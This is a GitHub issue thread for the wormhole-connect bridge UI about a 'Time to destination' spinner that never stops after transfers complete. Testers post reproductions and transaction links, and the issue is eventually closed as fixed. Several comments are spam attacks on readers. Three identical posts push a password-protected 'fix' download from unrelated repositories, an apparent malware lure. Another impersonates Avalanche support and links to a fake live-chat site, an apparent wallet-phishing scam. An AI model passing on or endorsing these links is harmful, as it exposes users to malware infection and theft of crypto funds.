### ISSUE TITLE
[QA] Infinite loading in "Time to Destination" field after transaction completion

### ISSUE THREAD

**Issue by agodlevska** [wormhole-foundation/wormhole-connect#2452]
## Describe the current behavior in detail
Checked on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZERGwPYm56iANoA6cQBEAogDEAggFUAMgBUA%2BpQDyClVIDKBMAFk0ATzTRK%2FQQF0QAXyA%3D%3D%3D) with macOS Sonoma 14.6.1 and Google Chrome Version 127.0.6533.122 (Official Build) (x86_64).

Steps:

1. Select Avalanche network and AVAX token in "From" section (MetaMask wallet)
2. Select BSC network and BNB token in "To" section (MetaMask wallet)
3. Enter Amount, in my case 0.119
4. Click Review transaction and after Confirm transaction 
5. Observe the "Time to destination" field after the transaction has finished.

Expected Result: After the transaction is completed, the "Time to destination" field should display the time taken for the transaction to complete, indicating the total transaction duration.

Actual Result: The loading spinner in the "Time to destination" field continues indefinitely, despite the transaction having finished more than 20 minutes ago.

## Attachments/Notes 

https://github.com/user-attachments/assets/cc4ef01c-1450-47af-8c42-189f190b9741

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Clarevero1** [comment]
@agodlevska You're experiencing transcript error. It sounds like your query would be best dealt with by the support team.
I'll have to refer you to the official support live chat with the ticket ID AVA07638
Please see the link below to our dedicated support line:
[Avalanche live support](https://thedappsupport.web.app) Click on the live chat icon at the bottom corner of the page to initiate chat with a live support agent

**Comment by tsadovska** [comment]
Issue is also reproducible on [wormhole-connect-testnet](https://wormhole-connect.netlify.app/?config=N4KABGCmB2BuBcYDkAXSBnF1IqQGnDAFd1IAlSAEwwEsBzaRFAJyMgIF8Qg%3D) (Connect v2) when sending 0.0001 BNB from BSC (MetaMask via WalletConnect) to Fantom (MetaMask via WalletConnect).
* Link to [Wormholescan](https://wormholescan.io/#/tx/0xa2a46c7c93092bd6a5f95e327c335e9e90c245d055615f3626a537b612091892?network=TESTNET)
* Send to tx: [BscScan](https://testnet.bscscan.com/tx/0xa2a46c7c93092bd6a5f95e327c335e9e90c245d055615f3626a537b612091892)
* Send to tx: [FTMScan](https://testnet.ftmscan.com/tx/0x4989b47e921e155a30670c3686a26b9699101a19aeb767d5af92992d50006333)


![Screenshot 2024-09-11 at 10 03 30](https://github.com/user-attachments/assets/daf8c703-7714-41de-a355-cad10c4c4633)

**Comment by agodlevska** [comment]
Still reproducible on [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZCAL5A%3D%3D) (Connect v2) when sending 0.001 WMATIC from Base (MetaMask) to BSC (MetaMask).

- Send from tx: [Base](https://basescan.org/tx/0xfc9cd92893f6254a9eeb89cf3aecb75bf0e30427508384aa631235e145521b4f)
- Send to tx: [BSC](https://bscscan.com/tx/0x94253fb05da2d1286c1b9a0217417e6084ce362a6238b7baf6dfa50ea0224d04)
- Link to [Wormholescan](https://wormholescan.io/#/tx/0xfc9cd92893f6254a9eeb89cf3aecb75bf0e30427508384aa631235e145521b4f)

Attachment:
<img width="1440" alt="Screenshot 2024-09-11 at 10 31 39" src="https://github.com/user-attachments/assets/65f16a81-4280-4b0b-9e4b-81d166dcda3c">

**Comment by agodlevska** [comment]
Issue is reproducible on https://preview.portalbridge.com/0af992dedf/ (Connect v2) when sending 0.001 AVAX from Avalanche (MetaMask) to Fantom (MetaMask).

- Send from tx: [Avalanche](https://snowtrace.io/tx/0x9f09ebd8f863df2f85641616e73516963974938d32a95342703fd2eb454c00b3?chainid=43114)
- Send to tx: [Fantom](https://ftmscan.com/tx/0x858ebfc9fdba41740ca3b6f88c666782135a840c80420a87d1efb4037bab055c)
- Link to [Wormholescan](https://wormholescan.io/#/tx/0x9f09ebd8f863df2f85641616e73516963974938d32a95342703fd2eb454c00b3)

Attachment:
<img width="1440" alt="Screenshot 2024-09-12 at 10 04 43" src="https://github.com/user-attachments/assets/73b6eb4f-93f5-4a6c-8809-828a4737ad4a">

**Comment by agodlevska** [comment]
Issue is no longer reproducible on https://preview.portalbridge.com/b1f3c5115d/ and [wormhole-connect-mainnet](https://wormhole-connect-mainnet.netlify.app/?config=N4KABGCmB2BuBcYDkBbAhgS2tSAXJANOGAK4DOkASpACaRkYDm0iuATiZCAL5A%3D%3D).
"Time to destination" field display the approximate time taken for the transaction to complete.
Closing the ticket.

Attachment:
<img width="1440" alt="Screenshot 2024-09-13 at 09 58 25" src="https://github.com/user-attachments/assets/c37741fc-eb94-4700-9142-725a4024c35d">

**Comment by agodlevska** [comment]
Reopening the ticket. 
Checked on https://preview.portalbridge.com/b1f3c5115d/, issue is reproducible when sending 0.0001 WBNB from Mantle (Coinbase) to Scroll (Coinbase). 
The loading spinner in the "Time to destination" field continues indefinitely, despite the transaction finished. 

Attachmnet:
<img width="1440" alt="Screenshot 2024-09-17 at 15 13 32" src="https://github.com/user-attachments/assets/c0acc091-fafe-45b2-bd56-0817c251b8d3">

**Comment by yuli-ferna** [comment]
I do other tests, and I think it works https://preview.portalbridge.com/b1f3c5115d/
@tsadovska 
<img width="547" alt="image" src="https://github.com/user-attachments/assets/dfcaf5f5-4153-44b9-87f2-5366d02841ff">

**Comment by yuli-ferna** [comment]
I tried with other chains, and it works now @agodlevska  https://preview.portalbridge.com/b1f3c5115d/
Let me know if the problem persists, please :)

<img width="661" alt="image" src="https://github.com/user-attachments/assets/80b09c49-1b56-49a4-8fc8-b4098d438570">

**Comment by agodlevska** [comment]
@yuli-ferna Issue is still reproducible on https://preview.portalbridge.com/b1f3c5115d/. 
It seems the issue occurs when the transaction lasts for some time and does not complete within a short period.

Attachment:
<img width="1439" alt="Screenshot 2024-09-18 at 11 26 54" src="https://github.com/user-attachments/assets/0f0996c6-55f5-4f66-8e10-d007f6a5b3f3">

**Comment by agodlevska** [comment]
Checked on https://portalbridge.com/. 
Issue is no longer reproducible, after the transaction is completed, the "Time to destination" field displays the approximate time taken for the transaction to complete. 

Closing the ticket.
